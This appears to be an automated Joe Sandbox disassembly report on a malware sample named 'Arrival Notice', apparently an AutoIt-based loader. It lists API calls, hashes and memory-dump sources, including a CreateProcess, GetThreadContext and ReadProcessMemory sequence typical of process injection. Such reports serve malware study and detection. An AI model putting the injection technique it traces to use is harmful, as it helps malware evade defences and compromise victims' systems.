                  • Opcode ID: 545234886299f8143774d75c8490f7b5bb989b054ed6a64299cdd8f7ff246a82
                  • Instruction ID: f817205db4c0d5d81647cfc36a9dcf6ea1efad07a048e72785b26b48673cb506
                  • Instruction Fuzzy Hash: DAD05B7590131467DA6097949C4EFC73A6CD705750F0001A17655D2091DAF49544CAD8
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004382F5
                  • TerminateProcess.KERNEL32(00000000), ref: 004382FC
                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 004384DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CurrentFreeLibraryTerminate
                  • String ID:
                  • API String ID: 146820519-0
                  • Opcode ID: 6033dc85c32bf8780b75ba0bfeffb818f291782c0f4007ab0db095a55df1e5d7
                  • Instruction ID: 52db8669866ebec36be787ca9225b95ab59064559d43449c7cd89153acb041f3
                  • Instruction Fuzzy Hash: 19126B71A083019FC724DF24C484B6AFBE1BF88318F14995EF9898B352DB35E945CB96
                  APIs
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B1BF4
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 003B1BFC
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B1C07
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B1C12
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 003B1C1A
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 003B1C22
                    • Part of subcall function 003B1B4A: RegisterWindowMessageW.USER32(00000004,?,003B12C4), ref: 003B1BA2
                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003B136A
                  • OleInitialize.OLE32 ref: 003B1388
                  • CloseHandle.KERNEL32(00000000,00000000), ref: 003F24AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                  • String ID:
                  • API String ID: 1986988660-0
                  • Opcode ID: 5605ad770a14ec8427727e531b7fc6961b2b9fef4a380a4a5e980d26e5032228
                  • Instruction ID: b804013e2e1a8cde8e8e83c48fa0e1d9b1fbdbaa8ecb06358eb8c202df8d1e4e
                  • Instruction Fuzzy Hash: 98719DB4911200AFC385EF79E896A9D3AE8BB887447548D3FD50ADB671EB3444428F4D
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,003E85CC,?,00478CC8,0000000C), ref: 003E8704
                  • GetLastError.KERNEL32(?,003E85CC,?,00478CC8,0000000C), ref: 003E870E
                  • __dosmaperr.LIBCMT ref: 003E8739
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                  • String ID:
                  • API String ID: 490808831-0
                  • Opcode ID: 5e6fd5ad81852691cdc06a5a53444c0a55e62dd57e9ac171eb02aae2a6d1687b
                  • Instruction ID: f3431f2bf2ea43e0ee972afe91f42d008d0a4ba1e0a9731aa63a60304325bac7
                  • Instruction Fuzzy Hash: 04016B36F052F016C2636336684577E67494B82778F3A0319FA1C9F1D2DEB08C818290
                  APIs
                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00422CD4,?,?,?,00000004,00000001), ref: 00422FF2
                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00422CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00423006
                  • CloseHandle.KERNEL32(00000000,?,00422CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042300D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$CloseCreateHandleTime
                  • String ID:
                  • API String ID: 3397143404-0
                  • Opcode ID: f356b815b036530e84ce2ead437712dd8ef488fdf871e5d7c94d63897f8a1d59
                  • Instruction ID: 00a4080f1f29719aa20b5040259592b93e0580821fb1ef4f604997a439b57ead
                  • Instruction Fuzzy Hash: 45E0863638122077D6301B55BC4DF8B3A1CD787B71F144220FB59761D046A4690146AC
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003C17F6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: CALL
                  • API String ID: 1385522511-4196123274
                  • Opcode ID: c74a0ad5c0dea6630e5c845cd53bd2d96f33d357dc362f1c948a6b713a4a1a19
                  • Instruction ID: ab42f80b64b7c07ffe3a707937acfada7febce751fee456e079039720f7c7f5e
                  • Instruction Fuzzy Hash: 6B2279706082019FC715DF24C480F2ABBF5AF86304F25892DE896DB3A2D775ED51DB86
                  APIs
                  • _wcslen.LIBCMT ref: 00426F6B
                    • Part of subcall function 003B4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EFD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LibraryLoad_wcslen
                  • String ID: >>>AUTOIT SCRIPT<<<
                  • API String ID: 3312870042-2806939583
                  • Opcode ID: 6ac9322457c2b283a367497842c0062dbe7b63e16b49b1931fb1cc80391a1838
                  • Instruction ID: 794bc617f54113e9355bfe49eb59ffc3a8d7a4fff649684f69172d09902f7df3
                  • Instruction Fuzzy Hash: D9B1C4312086118FCB15EF20D4919AFB7E5EF94308F44885EF5868B662EF34ED49CB96
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID: EA06
                  • API String ID: 2638373210-3962188686
                  • Opcode ID: 4a9c8e77ec28a0bfa8d5813793daa4fcd9a6712859c7ebc70957a34961dfbad1
                  • Instruction ID: d6bee273285c3ec1e88bf83207645134a66476ec57bb9d9e56047c6c74ac804c
                  • Instruction Fuzzy Hash: 1501B5729042687EDF19D7A8D856FEEBBF89B05701F00859BF152D6281E5B8E7088B60
                  APIs
                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B3908
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_
                  • String ID:
                  • API String ID: 1144537725-0
                  • Opcode ID: f5841cb540e88dc5a50ba7a21c7791028025172a224d1aba248af6371ea99284
                  • Instruction ID: 67ac94e325fd69baf7cf3b3da96d17231703ce743dd4e64cafaa1550fed78a8a
                  • Instruction Fuzzy Hash: B33184709047119FE762DF24D8847DBB7E8FB49708F00092EFA99C7650E771AA44CB56
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,003CCF58,?,?,?), ref: 003B6DBA
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,003CCF58,?,?,?), ref: 003B6DED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide
                  • String ID:
                  • API String ID: 626452242-0
                  • Opcode ID: 6db70f268a40960a99883afc87351ad1ed2bda4d5afd4b0d57bdf7a856bed0ce
                  • Instruction ID: 3e47edd5bd46bdf3251caa2a8157b8f4ffe05ab4b09ad650bf381ee9b9fa0606
                  • Instruction Fuzzy Hash: 8801F2713046007FEB2A6B79DD4BFAF7AADDB85300F04003DB206DA1E2E9A1EC008674
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03521A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03521AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03521B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                  • Instruction ID: e7e1da25ad5bd82a9712e3656a19798c6ec59fd162df8346706b551e1c3a9def
                  • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                  • Instruction Fuzzy Hash: EC12CD24E24658C6EB24DF64D8507DEB232FF69300F1094E9910DEB7A4E77A4F81CB5A
                  APIs
                    • Part of subcall function 003B4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E9C
                    • Part of subcall function 003B4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003B4EAE
                    • Part of subcall function 003B4E90: FreeLibrary.KERNEL32(00000000,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EC0
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EFD
                    • Part of subcall function 003B4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E62
                    • Part of subcall function 003B4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003B4E74
                    • Part of subcall function 003B4E59: FreeLibrary.KERNEL32(00000000,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E87
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$Load$AddressFreeProc
                  • String ID:
                  • API String ID: 2632591731-0
                  • Opcode ID: 42559e29114221c10c2a7c3619ad19eb7a35d7e5270eb90358791b92199eed7f
                  • Instruction ID: fed6d5439a6a944595f3b4aa68e87de53228ca5babb6a043156147ef4878dcca
                  • Opcode Fuzzy Hash: 42559e29114221c10c2a7c3619ad19eb7a35d7e5270eb90358791b92199eed7f
                  • Instruction Fuzzy Hash: FC11E732600205AADF16BB64DC02FFD77A5AF40B18F10442EF642AF5C2EEB4DB459758
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __wsopen_s
                  • String ID:
                  • API String ID: 3347428461-0
                  • Opcode ID: 6731ae4f73b9b34d3e9a0c11bb14288bd77279d97f848c6504db0556626d4805
                  • Instruction ID: 7f465175ef35e6e9300f1d121c647e50a00297bf55164bb5ae4639d840e9bfd1
                  • Opcode Fuzzy Hash: 6731ae4f73b9b34d3e9a0c11bb14288bd77279d97f848c6504db0556626d4805
                  • Instruction Fuzzy Hash: F111487190410AAFCB06DF59E94099E7BF8EF48310F114169F808AB352DB30EA11CBA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                  • Instruction ID: eece579f230a2572c80ba4fb820def382e8d5fd2ae32eacac85b84ce45523cac
                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                  • Instruction Fuzzy Hash: 39F02833510A24AAC7333A6ABC05B5B3B9C9F52334F11071BF4259F7D2DB74E80286A5
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: d6d609f099472db8b7c580f37dd3ad779cd08c5d36bff757f88410d9a0725986
                  • Instruction ID: 069bf0430844948f7b83245876658e81ff1fb7b9a30a7741a7aa2db74f4d1def
                  • Opcode Fuzzy Hash: d6d609f099472db8b7c580f37dd3ad779cd08c5d36bff757f88410d9a0725986
                  • Instruction Fuzzy Hash: 2BE0E5321012B467EA332767AC09B9A374CAF827B0F060332BC05979D0CB20DD0582E1
                  APIs
                  • FreeLibrary.KERNEL32(?,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4F6D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: e59e385a9f46902a90b518d470d0690b400088008fa934867f1b8ca052377dbe
                  • Instruction ID: 8ed64607f97af6098f4eb02cf68d8142e26349733990fdbd920d6eab159d5f97
                  • Opcode Fuzzy Hash: e59e385a9f46902a90b518d470d0690b400088008fa934867f1b8ca052377dbe
                  • Instruction Fuzzy Hash: D7F01571505752CFDB369F64E4908A2BBE4AF14329325897EE2EA87A22C7319844DF18
                  APIs
                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B2DC4
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LongNamePath_wcslen
                  • String ID:
                  • API String ID: 541455249-0
                  • Opcode ID: 955b6c5fce18a2255230627d3f4fcc89513ed6f53efa284e3ed7f98bc172224c
                  • Instruction ID: 71a4ad835b08abcee115a7c458769d291bff46d53740fb6d726d1a74741357e9
                  • Opcode Fuzzy Hash: 955b6c5fce18a2255230627d3f4fcc89513ed6f53efa284e3ed7f98bc172224c
                  • Instruction Fuzzy Hash: C6E0CD76A012245BC711D3599C06FEA77EDDFC8790F0401B1FE09D7248D9A4AD808550
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID:
                  • API String ID: 2638373210-0
                  • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                  • Instruction ID: 1a32bff150ff8246c41a9fbe3b05bab6f89db4f48ec1887fb8e344cca5515c00
                  • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                  • Instruction Fuzzy Hash: 98E04FB1609B106FDF396E28B9517B777E89F49300F00086FF69B86352E5B268458A4D
                  APIs
                    • Part of subcall function 003B3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B3908
                    • Part of subcall function 003BD730: GetInputState.USER32 ref: 003BD807
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003B2B6B
                    • Part of subcall function 003B30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 003B314E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                  • String ID:
                  • API String ID: 3667716007-0
                  • Opcode ID: 3bfec02a977f49e77c7fb527000e8560500eee123d50f148d293ae576d8021f6
                  • Instruction ID: 6b248a1abfde2e6921d9468dd7b24281a816c2883f2f515e54278236a2ce1645
                  • Opcode Fuzzy Hash: 3bfec02a977f49e77c7fb527000e8560500eee123d50f148d293ae576d8021f6
                  • Instruction Fuzzy Hash: DEE0262130021406C606BB7498525EDA3598BD1719F00093FF3428B563CF24464A4312
                  APIs
                  • CreateFileW.KERNELBASE(00000000,00000000,?,003F0704,?,?,00000000,?,003F0704,00000000,0000000C), ref: 003F03B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 6a24fcb4cb5217b7613d2f6c5e9e13423ecb0f937ec1a883d3d3f61b7dd131f0
                  • Instruction ID: 9da5ec69ae25a5eaab4c2dda34db93682c5a715f1e98b3f337e189560d1e8892
                  • Opcode Fuzzy Hash: 6a24fcb4cb5217b7613d2f6c5e9e13423ecb0f937ec1a883d3d3f61b7dd131f0
                  • Instruction Fuzzy Hash: 20D06C3204010DBBDF028F84DD46EDA3BAAFB48714F014010BE1856020C732E821AB94
                  APIs
                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 003B1CBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
